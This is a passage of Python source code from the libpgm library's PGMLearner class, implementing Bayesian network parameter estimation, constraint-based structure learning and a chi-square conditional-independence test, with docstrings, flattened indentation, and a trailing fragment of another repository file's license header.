This class is a machine with tools for learning Bayesian networks from data. It contains the *discrete_mle_estimateparams*, *lg_mle_estimateparams*, *discrete_constraint_estimatestruct*, *lg_constraint_estimatestruct*, *discrete_condind*, *discrete_estimatebn*, and *lg_estimatebn* methods.
'''
def discrete_mle_estimateparams(self, graphskeleton, data):
'''
Estimate parameters for a discrete Bayesian network with a structure given by *graphskeleton* in order to maximize the probability of data given by *data*. This function takes the following arguments:
1. *graphskeleton* -- An instance of the :doc:`GraphSkeleton <graphskeleton>` class containing vertex and edge data.
2. *data* -- A list of dicts containing samples from the network in {vertex: value} format. Example::
[
{
'Grade': 'B',
'SAT': 'lowscore',
...
},
...
]
This function normalizes the distribution of a node's outcomes for each combination of its parents' outcomes. In doing so it creates an estimated tabular conditional probability distribution for each node. It then instantiates a :doc:`DiscreteBayesianNetwork <discretebayesiannetwork>` instance based on the *graphskeleton*, and modifies that instance's *Vdata* attribute to reflect the estimated CPDs. It then returns the instance.
The Vdata attribute instantiated is in the format seen in :doc:`unittestdict`, as described in :doc:`discretebayesiannetwork`.
Usage example: this would learn parameters from a set of 200 discrete samples::
import json
from libpgm.nodedata import NodeData
from libpgm.graphskeleton import GraphSkeleton
from libpgm.discretebayesiannetwork import DiscreteBayesianNetwork
from libpgm.pgmlearner import PGMLearner
# generate some data to use
nd = NodeData()
nd.load("../tests/unittestdict.txt") # an input file
skel = GraphSkeleton()
skel.load("../tests/unittestdict.txt")
skel.toporder()
bn = DiscreteBayesianNetwork(skel, nd)
data = bn.randomsample(200)
# instantiate my learner
learner = PGMLearner()
# estimate parameters from data and skeleton
result = learner.discrete_mle_estimateparams(skel, data)
# output
print json.dumps(result.Vdata, indent=2)
'''
assert (isinstance(graphskeleton, GraphSkeleton)), "First arg must be a loaded GraphSkeleton class."
assert (isinstance(data, list) and data and isinstance(data[0], dict)), "Second arg must be a list of dicts."
# instantiate Bayesian network, and add parent and children data
bn = StaticNodeData()
graphskeleton.toporder()
for vertex in graphskeleton.V:
bn.Vdata[vertex] = dict()
bn.Vdata[vertex]["children"] = graphskeleton.getchildren(vertex)
bn.Vdata[vertex]["parents"] = graphskeleton.getparents(vertex)
# make placeholders for vals, cprob, and numoutcomes
bn.Vdata[vertex]["vals"] = []
if (bn.Vdata[vertex]["parents"] == []):
bn.Vdata[vertex]["cprob"] = []
else:
bn.Vdata[vertex]["cprob"] = dict()
bn.Vdata[vertex]["numoutcomes"] = 0
bn = DiscreteBayesianNetwork(bn)
# determine which outcomes are possible for each node
for sample in data:
for vertex in bn.V:
if (sample[vertex] not in bn.Vdata[vertex]["vals"]):
bn.Vdata[vertex]["vals"].append(sample[vertex])
bn.Vdata[vertex]["numoutcomes"] += 1
# lay out probability tables, and put a [num, denom] entry in all spots:
# define helper function to recursively set up cprob table
def addlevel(vertex, _dict, key, depth, totaldepth):
if depth == totaldepth:
_dict[str(key)] = []
for _ in range(bn.Vdata[vertex]["numoutcomes"]):
_dict[str(key)].append([0, 0])
return
else:
for val in bn.Vdata[bn.Vdata[vertex]["parents"][depth]]["vals"]:
ckey = key[:]
ckey.append(str(val))
addlevel(vertex, _dict, ckey, depth+1, totaldepth)
# put [0, 0] at each entry of cprob table
for vertex in bn.V:
if (bn.Vdata[vertex]["parents"]):
root = bn.Vdata[vertex]["cprob"]
numparents = len(bn.Vdata[vertex]["parents"])
addlevel(vertex, root, [], 0, numparents)
else:
for _ in range(bn.Vdata[vertex]["numoutcomes"]):
bn.Vdata[vertex]["cprob"].append([0, 0])
# fill out entries with samples:
for sample in data:
for vertex in bn.V:
# compute index of result
rindex = bn.Vdata[vertex]["vals"].index(sample[vertex])
# go to correct place in Vdata
if bn.Vdata[vertex]["parents"]:
pvals = [str(sample[t]) for t in bn.Vdata[vertex]["parents"]]
lev = bn.Vdata[vertex]["cprob"][str(pvals)]
else:
lev = bn.Vdata[vertex]["cprob"]
# increase all denominators for the current condition
for entry in lev:
entry[1] += 1
# increase numerator for current outcome
lev[rindex][0] += 1
# convert arrays to floats
for vertex in bn.V:
if not bn.Vdata[vertex]["parents"]:
bn.Vdata[vertex]["cprob"] = [x[0]/float(x[1]) for x in bn.Vdata[vertex]["cprob"]]
else:
for key in bn.Vdata[vertex]["cprob"].keys():
try:
bn.Vdata[vertex]["cprob"][key] = [x[0]/float(x[1]) for x in bn.Vdata[vertex]["cprob"][key]]
# default to even distribution if no data points
except ZeroDivisionError:
bn.Vdata[vertex]["cprob"][key] = [1/float(bn.Vdata[vertex]["numoutcomes"]) for x in bn.Vdata[vertex]["cprob"][key]]
# return cprob table with estimated probability distributions
return bn
def lg_mle_estimateparams(self, graphskeleton, data):
'''
Estimate parameters for a linear Gaussian Bayesian network with a structure given by *graphskeleton* in order to maximize the probability of data given by *data*. This function takes the following arguments:
1. *graphskeleton* -- An instance of the :doc:`GraphSkeleton <graphskeleton>` class containing vertex and edge data.
2. *data* -- A list of dicts containing samples from the network in {vertex: value} format. Example::
[
{
'Grade': 74.343,
'Intelligence': 29.545,
...
},
...
]
The algorithm used to calculate the linear Gaussian parameters is beyond the scope of this documentation -- for a full explanation, cf. Koller et al. 729. After the parameters are calculated, the program instantiates a :doc:`DiscreteBayesianNetwork <discretebayesiannetwork>` instance based on the *graphskeleton*, and modifies that instance's *Vdata* attribute to reflect the estimated CPDs. It then returns the instance.
The Vdata attribute instantiated is in the format seen in the input file example :doc:`unittestdict`, as described in :doc:`discretebayesiannetwork`.
Usage example: this would learn parameters from a set of 200 linear Gaussian samples::
import json
from libpgm.nodedata import NodeData
from libpgm.graphskeleton import GraphSkeleton
from libpgm.lgbayesiannetwork import LGBayesianNetwork
from libpgm.pgmlearner import PGMLearner
# generate some data to use
nd = NodeData()
nd.load("../tests/unittestlgdict.txt") # an input file
skel = GraphSkeleton()
skel.load("../tests/unittestdict.txt")
skel.toporder()
lgbn = LGBayesianNetwork(skel, nd)
data = lgbn.randomsample(200)
# instantiate my learner
learner = PGMLearner()
# estimate parameters
result = learner.lg_mle_estimateparams(skel, data)
# output
print json.dumps(result.Vdata, indent=2)
'''
assert (isinstance(graphskeleton, GraphSkeleton)), "First arg must be a loaded GraphSkeleton class."
assert (isinstance(data, list) and data and isinstance(data[0], dict)), "Second arg must be a list of dicts."
# instantiate Bayesian network, and add parent and children data
bn = StaticNodeData()
graphskeleton.toporder()
for vertex in graphskeleton.V:
bn.Vdata[vertex] = dict()
bn.Vdata[vertex]["children"] = graphskeleton.getchildren(vertex)
bn.Vdata[vertex]["parents"] = graphskeleton.getparents(vertex)
# make placeholders for mean_base, mean_scal, and variance
bn.Vdata[vertex]["mean_base"] = 0.0
bn.Vdata[vertex]["mean_scal"] = []
for parent in bn.Vdata[vertex]["parents"]:
bn.Vdata[vertex]["mean_scal"].append(0.0)
bn.Vdata[vertex]["variance"] = 0.0
bn = LGBayesianNetwork(bn)
# make covariance table, array of E[X_i] for each vertex, and table
# of E[X_i * X_j] for each combination of vertices
cov = [[0 for _ in range(len(bn.V))] for __ in range(len(bn.V))]
singletons = [0 for _ in range(len(bn.V))]
numtrials = len(data)
for sample in data:
for x in range(len(bn.V)):
singletons[x] += sample[bn.V[x]]
for y in range(len(bn.V)):
cov[x][y] += sample[bn.V[x]] * sample[bn.V[y]]
for x in range(len(bn.V)):
singletons[x] /= float(numtrials)
for y in range(len(bn.V)):
cov[x][y] /= float(numtrials)
# (save copy. this is the E[X_i * X_j] table)
product_expectations = [[cov[x][y] for y in range(len(bn.V))] for x in range(len(bn.V))]
for x in range(len(bn.V)):
for y in range(len(bn.V)):
cov[x][y] = cov[x][y] - (singletons[x] * singletons[y])
# construct system of equations and solve (for each node)
for x in range(len(bn.V)):
# start with the E[X_i * X_j] table
system = [[product_expectations[p][q] for q in range(len(bn.V))] for p in range(len(bn.V))]
# step 0: remove all entries from all the tables except for node and its parents
rowstokeep = [x]
for z in range(len(bn.V)):
if bn.V[z] in bn.Vdata[bn.V[x]]["parents"]:
rowstokeep.append(z)
smalldim = len(rowstokeep)
smallsystem = [[0 for _ in range(smalldim)] for __ in range(smalldim)]
smallcov = [[0 for _ in range(smalldim)] for __ in range(smalldim)]
smallsing = [0 for _ in range(smalldim)]
for index in range(len(rowstokeep)):
smallsing[index] = singletons[rowstokeep[index]]
for index2 in range(len(rowstokeep)):
smallsystem[index][index2] = system[rowstokeep[index]][rowstokeep[index2]]
smallcov[index][index2] = cov[rowstokeep[index]][rowstokeep[index2]]
# step 1: delete and copy row corresponding to node (using [row][column] notation)
tmparray = [0 for _ in range(smalldim)]
for y in range(smalldim):
if (y > 0):
for j in range(smalldim):
smallsystem[y-1][j] = smallsystem[y][j]
if (y == 0):
for j in range(smalldim):
tmparray[j] = smallsystem[y][j]
# step 2: delete column, leaving system with all entries
# corresponding to parents of node
for y in range(smalldim):
if (y > 0):
for j in range(smalldim):
smallsystem[j][y-1] = smallsystem[j][y]
# step 3: take entry for node out of singleton array and store it
bordarray = []
for y in range(smalldim):
if (y != 0):
bordarray.append(smallsing[y])
else:
tmpentry = smallsing[y]
# step 4: add border array on borders of system
for y in range(len(bordarray)):
smallsystem[smalldim - 1][y] = bordarray[y]
smallsystem[y][smalldim - 1] = bordarray[y]
smallsystem[smalldim - 1][smalldim - 1] = 1
# step 5: construct equality vector (the 'b' of ax = b)
evector = [0 for _ in range(smalldim)]
for y in range(smalldim):
if (y != smalldim - 1):
evector[y] = tmparray[y + 1]
else:
evector[y] = tmpentry
# use numpy to solve
a = np.array(smallsystem)
b = np.array(evector)
solve = list(np.linalg.solve(a, b))
# fill mean_base and mean_scal[] with this data
bn.Vdata[bn.V[x]]["mean_base"] = solve[smalldim - 1]
for i in range(smalldim - 1):
bn.Vdata[bn.V[x]]["mean_scal"][i] = solve[i]
# add variance
variance = smallcov[0][0]
for y in range(1, smalldim):
for z in range(1, smalldim):
variance -= (bn.Vdata[bn.V[x]]["mean_scal"][y-1] * bn.Vdata[bn.V[x]]["mean_scal"][z-1] * smallcov[y][z])
bn.Vdata[bn.V[x]]["variance"] = variance
# that's all folks
return bn
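# Illustrative sketch (toy numbers) of the np.linalg.solve step used above:
# np.linalg.solve(np.array([[2., 0.], [0., 1.]]), np.array([4., 3.]))
# yields array([2., 3.]), i.e. the x that satisfies a x = b.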
def discrete_constraint_estimatestruct(self, data, pvalparam=0.05, indegree=1):
'''
Learn a Bayesian network structure from discrete data given by *data*, using constraint-based approaches. This function first calculates all the independencies and conditional independencies present between variables in the data. To calculate dependencies, it uses the *discrete_condind* method on each pair of variables, conditioned on other sets of variables of size *indegree* or smaller, to generate a chi-squared result and a p-value. If this p-value is less than *pvalparam*, the pair of variables are considered dependent conditioned on the variable set. Once all true dependencies -- pairs of variables that are dependent no matter what they are conditioned by -- are found, the algorithm uses these dependencies to construct a directed acyclic graph. It returns this DAG in the form of a :doc:`GraphSkeleton <graphskeleton>` class.
Arguments:
1. *data* -- An array of dicts containing samples from the network in {vertex: value} format. Example::
[
{
'Grade': 'B',
'SAT': 'lowscore',
...
},
...
]
2. *pvalparam* -- (Optional, default is 0.05) The p-value below which to consider something significantly unlikely. A common number used is 0.05. This is passed to *discrete_condind* when it is called.
3. *indegree* -- (Optional, default is 1) The upper bound on the size of a witness set (see Koller et al. 85). If this is larger than 1, a huge number of samples in *data* is required to avoid a divide-by-zero error.
Usage example: this would learn structure from a set of 8000 discrete samples::
import json
from libpgm.nodedata import NodeData
from libpgm.graphskeleton import GraphSkeleton
from libpgm.discretebayesiannetwork import DiscreteBayesianNetwork
from libpgm.pgmlearner import PGMLearner
# generate some data to use
nd = NodeData()
nd.load("../tests/unittestdict.txt") # an input file
skel = GraphSkeleton()
skel.load("../tests/unittestdict.txt")
skel.toporder()
bn = DiscreteBayesianNetwork(skel, nd)
data = bn.randomsample(8000)
# instantiate my learner
learner = PGMLearner()
# estimate structure
result = learner.discrete_constraint_estimatestruct(data)
# output
print json.dumps(result.E, indent=2)
'''
assert (isinstance(data, list) and data and isinstance(data[0], dict)), "Arg must be a list of dicts."
# instantiate array of variables and array of potential dependencies
variables = list(data[0].keys())
ovariables = variables[:]
dependencies = []
for x in variables:
ovariables.remove(x)
for y in ovariables:
if (x != y):
dependencies.append([x, y])
# define helper function to find subsets
def subsets(array):
result = []
for i in range(indegree + 1):
comb = itertools.combinations(array, i)
for c in comb:
result.append(list(c))
return result
witnesses = []
othervariables = variables[:]
# for each pair of variables X, Y:
for X in variables:
othervariables.remove(X)
for Y in othervariables:
# consider all sets of witnesses that do not have X or Y in
# them, and are less than or equal to the size specified by
# the "indegree" argument
for U in subsets(variables):
if (X not in U) and (Y not in U) and len(U) <= indegree:
# determine conditional independence
chi, pv, witness = self.discrete_condind(data, X, Y, U)
if pv > pvalparam:
msg = "***%s and %s are found independent (chi = %f, pv = %f) with witness %s***" % (X, Y, chi, pv, U)
try:
dependencies.remove([X, Y])
dependencies.remove([Y, X])
except ValueError:  # the pair may already have been removed
pass
witnesses.append([X, Y, witness])
break
# now that we have found our dependencies, run build PDAG (cf. Koller p. 89)
# with the stored set of independencies:
# assemble undirected graph skeleton
pdag = GraphSkeleton()
pdag.E = dependencies
pdag.V = variables
# adjust for immoralities (cf. Koller 86)
dedges = [x[:] for x in pdag.E]
for edge in dedges:
edge.append('u')
# define helper method "exists_undirected_edge"
def exists_undirected_edge(one_end, the_other_end):
for edge in dedges:
if len(edge) == 3:
if (edge[0] == one_end and edge[1] == the_other_end):
return True
elif (edge[1] == one_end and edge[0] == the_other_end):
return True
return False
# define helper method "exists_edge"
def exists_edge(one_end, the_other_end):
if exists_undirected_edge(one_end, the_other_end):
return True
elif [one_end, the_other_end] in dedges:
return True
elif [the_other_end, one_end] in dedges:
return True
return False
for edge1 in reversed(dedges):
for edge2 in reversed(dedges):
if (edge1 in dedges) and (edge2 in dedges):
if edge1[0] == edge2[1] and not exists_edge(edge1[1], edge2[0]):
if (([edge1[1], edge2[0], [edge1[0]]] not in witnesses) and ([edge2[0], edge1[1], [edge1[0]]] not in witnesses)):
dedges.append([edge1[1], edge1[0]])
dedges.append([edge2[0], edge2[1]])
dedges.remove(edge1)
dedges.remove(edge2)
elif edge1[1] == edge2[0] and not exists_edge(edge1[0], edge2[1]):
if (([edge1[0], edge2[1], [edge1[1]]] not in witnesses) and ([edge2[1], edge1[0], [edge1[1]]] not in witnesses)):
dedges.append([edge1[0], edge1[1]])
dedges.append([edge2[1], edge2[0]])
dedges.remove(edge1)
dedges.remove(edge2)
elif edge1[1] == edge2[1] and edge1[0] != edge2[0] and not exists_edge(edge1[0], edge2[0]):
if (([edge1[0], edge2[0], [edge1[1]]] not in witnesses) and ([edge2[0], edge1[0], [edge1[1]]] not in witnesses)):
dedges.append([edge1[0], edge1[1]])
dedges.append([edge2[0], edge2[1]])
dedges.remove(edge1)
dedges.remove(edge2)
elif edge1[0] == edge2[0] and edge1[1] != edge2[1] and not exists_edge(edge1[1], edge2[1]):
if (([edge1[1], edge2[1], [edge1[0]]] not in witnesses) and ([edge2[1], edge1[1], [edge1[0]]] not in witnesses)):
dedges.append([edge1[1], edge1[0]])
dedges.append([edge2[1], edge2[0]])
dedges.remove(edge1)
dedges.remove(edge2)
# use right hand rules to improve graph until convergence (Koller 89)
olddedges = []
while (olddedges != dedges):
olddedges = [x[:] for x in dedges]
for edge1 in reversed(dedges):
for edge2 in reversed(dedges):
# rule 1
inverted = False
check1, check2 = False, True
if (edge1[1] == edge2[0] and len(edge1) == 2 and len(edge2) == 3):
check1 = True
elif (edge1[1] == edge2[1] and len(edge1) == 2 and len(edge2) == 3):
check1 = True
inverted = True
for edge3 in dedges:
if edge3 != edge1 and ((edge3[0] == edge1[0] and edge3[1]
== edge2[1]) or (edge3[1] == edge1[0] and edge3[0]
== edge2[1])):
check2 = False
if check1 == True and check2 == True:
if inverted:
dedges.append([edge1[1], edge2[0]])
else:
dedges.append([edge1[1], edge2[1]])
dedges.remove(edge2)
# rule 2
check1, check2 = False, False
if (edge1[1] == edge2[0] and len(edge1) == 2 and len(edge2) == 2):
check1 = True
for edge3 in dedges:
if ((edge3[0] == edge1[0] and edge3[1]
== edge2[1]) or (edge3[1] == edge1[0] and edge3[0]
== edge2[1]) and len(edge3) == 3):
check2 = True
if check1 == True and check2 == True:
if edge3[0] == edge1[0]:
dedges.append([edge3[0], edge3[1]])
elif edge3[1] == edge1[0]:
dedges.append([edge3[1], edge3[0]])
dedges.remove(edge3)
# rule 3
check1, check2 = False, False
if len(edge1) == 2 and len(edge2) == 2:
if (edge1[1] == edge2[1] and edge1[0] != edge2[0]):
check1 = True
for v in variables:
if (exists_undirected_edge(v, edge1[0]) and
exists_undirected_edge(v, edge1[1]) and
exists_undirected_edge(v, edge2[0])):
check2 = True
if check1 == True and check2 == True:
dedges.append([v, edge1[1]])
for edge3 in dedges:
if (len(edge3) == 3 and ((edge3[0] == v and edge3[1]
== edge1[1]) or (edge3[1] == v and edge3[0] ==
edge1[1]))):
dedges.remove(edge3)
# return one possible graph skeleton from the pdag class found
for x in range(len(dedges)):
if len(dedges[x]) == 3:
dedges[x] = dedges[x][:2]
pdag.E = dedges
pdag.toporder()
return pdag
def lg_constraint_estimatestruct(self, data, pvalparam=0.05, bins=10, indegree=1):
'''
Learn a Bayesian network structure from linear Gaussian data given by *data* using constraint-based approaches. This function works by discretizing the linear Gaussian data into *bins* number of bins, and running the *discrete_constraint_estimatestruct* method on that discrete data with *pvalparam* and *indegree* as arguments. It returns the :doc:`GraphSkeleton <graphskeleton>` instance returned by this function.
Arguments:
1. *data* -- An array of dicts containing samples from the network in {vertex: value} format. Example::
[
{
'Grade': 78.3223,
'SAT': 56.33,
...
},
...
]
2. *pvalparam* -- (Optional, default is 0.05) The p-value below which to consider something significantly unlikely. A common number used is 0.05
3. *bins* -- (Optional, default is 10) The number of bins to discretize the data into. The method is to find the highest and lowest value, divide that interval uniformly into a certain number of bins, and place the data inside. This number must be chosen carefully in light of the number of trials. There must be at least 5 trials in every bin, with more if the indegree is increased.
4. *indegree* -- (Optional, default is 1) The upper bound on the size of a witness set (see Koller et al. 85). If this is larger than 1, a huge number of trials is required to avoid a divide-by-zero error.
The number of bins and indegree must be chosen carefully based on the size and nature of the data set. Too many bins will lead to not enough data per bin, while too few bins will lead to dependencies not getting noticed.
Usage example: this would learn structure from a set of 8000 linear Gaussian samples::
import json
from libpgm.nodedata import NodeData
from libpgm.graphskeleton import GraphSkeleton
from libpgm.lgbayesiannetwork import LGBayesianNetwork
from libpgm.pgmlearner import PGMLearner
# generate some data to use
nd = NodeData()
nd.load("../tests/unittestdict.txt") # an input file
skel = GraphSkeleton()
skel.load("../tests/unittestdict.txt")
skel.toporder()
lgbn = LGBayesianNetwork(skel, nd)
data = lgbn.randomsample(8000)
# instantiate my learner
learner = PGMLearner()
# estimate structure
result = learner.lg_constraint_estimatestruct(data)
# output
print json.dumps(result.E, indent=2)
'''
assert (isinstance(data, list) and data and isinstance(data[0], dict)), "Arg must be a list of dicts."
cdata = copy.deepcopy(data)
# establish ranges
ranges = dict()
for variable in cdata[0].keys():
ranges[variable] = [float("infinity"), float("infinity") * -1]
for sample in cdata:
for var in sample.keys():
if sample[var] < ranges[var][0]:
ranges[var][0] = sample[var]
if sample[var] > ranges[var][1]:
ranges[var][1] = sample[var]
# discretize cdata set
bincounts = dict()
for key in cdata[0].keys():
bincounts[key] = [0 for _ in range(bins)]
for sample in cdata:
for i in range(bins):
for var in sample.keys():
if (sample[var] >= (ranges[var][0] + (ranges[var][1] - ranges[var][0]) * i / float(bins)) and (sample[var] <= (ranges[var][0] + (ranges[var][1] - ranges[var][0]) * (i + 1) / float(bins)))):
sample[var] = i
bincounts[var][i] += 1
# run discrete_constraint_estimatestruct
return self.discrete_constraint_estimatestruct(cdata, pvalparam, indegree)
def discrete_condind(self, data, X, Y, U):
'''
Test how independent a variable *X* and a variable *Y* are in a discrete data set given by *data*, where the independence is conditioned on a set of variables given by *U*. This method works by assuming as a null hypothesis that the variables are conditionally independent on *U*, and thus that:
.. math::
P(X, Y, U) = P(U) \\cdot P(X|U) \\cdot P(Y|U)
It tests the deviance of the data from this null hypothesis, returning the result of a chi-square test and a p-value.
Arguments:
1. *data* -- An array of dicts containing samples from the network in {vertex: value} format. Example::
[
{
'Grade': 'B',
'SAT': 'lowscore',
...
},
...
]
2. *X* -- A variable whose dependence on Y we are testing given U.
3. *Y* -- A variable whose dependence on X we are testing given U.
4. *U* -- A list of variables that are given.
Returns:
1. *chi* -- The result of the chi-squared test on the data. This is a
measure of the deviance of the actual distribution of X and
Y given U from the expected distribution of X and Y given U.
Since the null hypothesis is that X and Y are independent
given U, the expected distribution is that :math:`P(X, Y, U) =
P(U) P(X | U) P (Y | U)`.
2. *pval* -- The p-value of the test, meaning the probability of
attaining a chi-square result as extreme as or more extreme
than the one found, assuming that the null hypothesis is
true. (e.g., a p-value of .05 means that if X and Y were
independent given U, the chance of getting a chi-squared
result this high or higher would be .05)
3. *U* -- The 'witness' of X and Y's independence. This is the variable
that, when it is known, leaves X and Y independent.
For more information see Koller et al. 790.
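Usage example: a sketch testing whether 'Grade' and 'SAT' are independent given 'Intelligence' (the vertex names are illustrative, and *data* is assumed to be a list of discrete samples, e.g. from a DiscreteBayesianNetwork's *randomsample* method)::
from libpgm.pgmlearner import PGMLearner
learner = PGMLearner()
chi, pval, witness = learner.discrete_condind(data, "Grade", "SAT", ["Intelligence"])
if pval > .05:
print "Grade and SAT are plausibly independent given Intelligence"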
'''
# find possible outcomes and store
_outcomes = dict()
for key in data[0].keys():
_outcomes[key] = [data[0][key]]
for sample in data:
for key in _outcomes.keys():
if _outcomes[key].count(sample[key]) == 0:
_outcomes[key].append(sample[key])
# store number of outcomes for X, Y, and U
Xnumoutcomes = len(_outcomes[X])
Ynumoutcomes = len(_outcomes[Y])
Unumoutcomes = []
for val in U:
Unumoutcomes.append(len(_outcomes[val]))
# calculate P(U) -- the distribution of U
PU = 1
# define helper function to add a dimension to an array recursively
def add_dimension_to_array(mdarray, size):
if isinstance(mdarray, list):
for h in range(len(mdarray)):
mdarray[h] = add_dimension_to_array(mdarray[h], size)
return mdarray
else:
mdarray = [0 for _ in range(size)]
return mdarray
# make PU the right size
for size in Unumoutcomes:
PU = add_dimension_to_array(PU, size)
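# note: PU and the joint tables below accumulate raw counts rather than
# normalized probabilities; the common count scale cancels when the expected
# counts PXandU * PYandU / PU are compared against the observed counts PXYU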
# fill with data
if (len(U) > 0):
for sample in data:
tmp = PU
for x in range(len(U)-1):
Uindex = _outcomes[U[x]].index(sample[U[x]])
tmp = tmp[Uindex]
lastindex = _outcomes[U[-1]].index(sample[U[-1]])
tmp[lastindex] += 1
# calculate P(X, U) -- the distribution of X and U
PXandU = [0 for _ in range(Xnumoutcomes)]
for size in Unumoutcomes:
PXandU = add_dimension_to_array(PXandU, size)
for sample in data:
Xindex = _outcomes[X].index(sample[X])
if len(U) > 0:
tmp = PXandU[Xindex]
for x in range(len(U)-1):
Uindex = _outcomes[U[x]].index(sample[U[x]])
tmp = tmp[Uindex]
lastindex = _outcomes[U[-1]].index(sample[U[-1]])
tmp[lastindex] += 1
else:
PXandU[Xindex] += 1
# calculate P(Y, U) -- the distribution of Y and U
PYandU = [0 for _ in range(Ynumoutcomes)]
for size in Unumoutcomes:
PYandU = add_dimension_to_array(PYandU, size)
for sample in data:
Yindex = _outcomes[Y].index(sample[Y])
if len(U) > 0:
tmp = PYandU[Yindex]
for x in range(len(U)-1):
Uindex = _outcomes[U[x]].index(sample[U[x]])
tmp = tmp[Uindex]
lastindex = _outcomes[U[-1]].index(sample[U[-1]])
tmp[lastindex] += 1
else:
PYandU[Yindex] += 1
# assemble P(U)P(X|U)P(Y|U) -- the expected distribution if X and Y are
# independent given U.
expected = [[ 0 for _ in range(Ynumoutcomes)] for __ in range(Xnumoutcomes)]
# define helper function to multiply the entries of two matrices
def multiply_entries(matrixa, matrixb):
matrix1 = copy.deepcopy(matrixa)
matrix2 = copy.deepcopy(matrixb)
if isinstance(matrix1, list):
for h in range(len(matrix1)):
matrix1[h] = multiply_entries(matrix1[h], matrix2[h])
return matrix1
else:
return (matrix1 * matrix2)
# define helper function to divide the entries of two matrices
def divide_entries(matrixa, matrixb):
matrix1 = copy.deepcopy(matrixa)
matrix2 = copy.deepcopy(matrixb)
if isinstance(matrix1, list):
for h in range(len(matrix1)):
matrix1[h] = divide_entries(matrix1[h], matrix2[h])
return matrix1
else:
return (matrix1 / float(matrix2))
# combine known graphs to calculate P(U)P(X|U)P(Y|U)
for x in range(Xnumoutcomes):
for y in range(Ynumoutcomes):
product = multiply_entries(PXandU[x], PYandU[y])
final = divide_entries(product, PU)
expected[x][y] = final
# find P(XYU) -- the actual distribution of X, Y, and U -- in sample
PXYU = [[ 0 for _ in range(Ynumoutcomes)] for __ in range(Xnumoutcomes)]
for size in Unumoutcomes:
PXYU = add_dimension_to_array(PXYU, size)
for sample in data:
Xindex = _outcomes[X].index(sample[X])
Yindex = _outcomes[Y].index(sample[Y])
if len(U) > 0:
tmp = PXYU[Xindex][Yindex]
for x in range(len(U)-1):
Uindex = _outcomes[U[x]].index(sample[U[x]])
tmp = tmp[Uindex]
lastindex = _outcomes[U[-1]].index(sample[U[-1]])
tmp[lastindex] += 1
else:
PXYU[Xindex][Yindex] += 1
# use scipy's chisquare to determine the deviance of the evidence
a = np.array(expected)
a = a.flatten()
b = np.array(PXYU)
b = b.flatten()
# delete entries with value 0 (they mess up the chisquare function)
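# (when an observed entry b[i] is dropped, its expected mass a[i] is folded
# into the previous cell so the two flattened arrays keep comparable totals)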
for i in reversed(range(b.size)):
if (b[i] == 0):
if i != 0:
a.itemset(i-1, a[i-1]+a[i])
a = np.delete(a, i)
b = np.delete(b, i)
# run chi-squared
chi, pv = chisquare(a, b)
# return chi-squared result, p-value for that result, and witness
return chi, pv, U
def discrete_estimatebn(self, data, pvalparam=.05, indegree=1):
'''
Fully learn a Bayesian network from discrete data given by *data*. This function combines the *discrete_constraint_estimatestruct* method (where it passes in the *pvalparam* and *indegree* arguments) with the *discrete_mle_estimateparams* method. It returns a complete :doc:`DiscreteBayesianNetwork <discretebayesiannetwork>` class instance learned from the data.
Arguments:
1. *data* -- An array of dicts containing samples from the network in {vertex: value} format. Example::
[
{
'Grade': 'B',
'SAT': 'lowscore',
...
},
...
]
2. *pvalparam* -- The p-value below which to consider something significantly unlikely. A common number used is 0.05
3. *indegree* -- The upper bound on the size of a witness set (see Koller et al. 85). If this is larger than 1, a huge number of trials is required to avoid a divide-by-zero error.
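Usage example: a sketch that learns a full network from 8000 discrete samples (it mirrors the DISCRETE half of the combined example under *lg_estimatebn* below; *data* is assumed to come from a DiscreteBayesianNetwork's *randomsample* method)::
import json
from libpgm.pgmlearner import PGMLearner
learner = PGMLearner()
result = learner.discrete_estimatebn(data)
print json.dumps(result.E, indent=2)
print json.dumps(result.Vdata, indent=2)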
'''
assert (isinstance(data, list) and data and isinstance(data[0], dict)), "Arg must be a list of dicts."
# learn graph skeleton
skel = self.discrete_constraint_estimatestruct(data, pvalparam=pvalparam, indegree=indegree)
# learn parameters
bn = self.discrete_mle_estimateparams(skel, data)
# return
return bn
def lg_estimatebn(self, data, pvalparam=.05, bins=10, indegree=1):
'''
Fully learn a Bayesian network from linear Gaussian data given by *data*. This function combines the *lg_constraint_estimatestruct* method (where it passes in the *pvalparam*, *bins*, and *indegree* arguments) with the *lg_mle_estimateparams* method. It returns a complete :doc:`LGBayesianNetwork <lgbayesiannetwork>` class instance learned from the data.
Arguments:
1. *data* -- An array of dicts containing samples from the network in {vertex: value} format. Example::
[
{
'Grade': 75.23423,
'SAT': 873.42342,
...
},
...
]
2. *pvalparam* -- The p-value below which to consider something significantly unlikely. A common number used is 0.05
3. *bins* -- (Optional, default is 10) The number of bins to discretize the data into when testing for structure. 4. *indegree* -- The upper bound on the size of a witness set (see Koller et al. 85). If this is larger than 1, a huge number of trials is required to avoid a divide-by-zero error.
Usage example: this would learn entire Bayesian networks from sets of 8000 data points::
import json
from libpgm.nodedata import NodeData
from libpgm.graphskeleton import GraphSkeleton
from libpgm.lgbayesiannetwork import LGBayesianNetwork
from libpgm.discretebayesiannetwork import DiscreteBayesianNetwork
from libpgm.pgmlearner import PGMLearner
# LINEAR GAUSSIAN
# generate some data to use
nd = NodeData()
nd.load("../tests/unittestlgdict.txt") # an input file
skel = GraphSkeleton()
skel.load("../tests/unittestdict.txt")
skel.toporder()
lgbn = LGBayesianNetwork(skel, nd)
data = lgbn.randomsample(8000)
# instantiate my learner
learner = PGMLearner()
# learn bayesian network
result = learner.lg_estimatebn(data)
# output
print json.dumps(result.E, indent=2)
print json.dumps(result.Vdata, indent=2)
# DISCRETE
# generate some data to use
nd = NodeData()
nd.load("../tests/unittestdict.txt") # an input file
skel = GraphSkeleton()
skel.load("../tests/unittestdict.txt")
skel.toporder()
bn = DiscreteBayesianNetwork(skel, nd)
data = bn.randomsample(8000)
# instantiate my learner
learner = PGMLearner()
# learn bayesian network
result = learner.discrete_estimatebn(data)
# output
print json.dumps(result.E, indent=2)
print json.dumps(result.Vdata, indent=2)
'''
assert (isinstance(data, list) and data and isinstance(data[0], dict)), "Arg must be a list of dicts."
# learn graph skeleton
skel = self.lg_constraint_estimatestruct(data, pvalparam=pvalparam, bins=bins, indegree=indegree)
# learn parameters
bn = self.lg_mle_estimateparams(skel, data)
# return
return bn
|
bsd-3-clause
|
elkingtonmcb/nupic
|
examples/bindings/sparse_matrix_how_to.py
|
35
|
12347
|
#!/usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
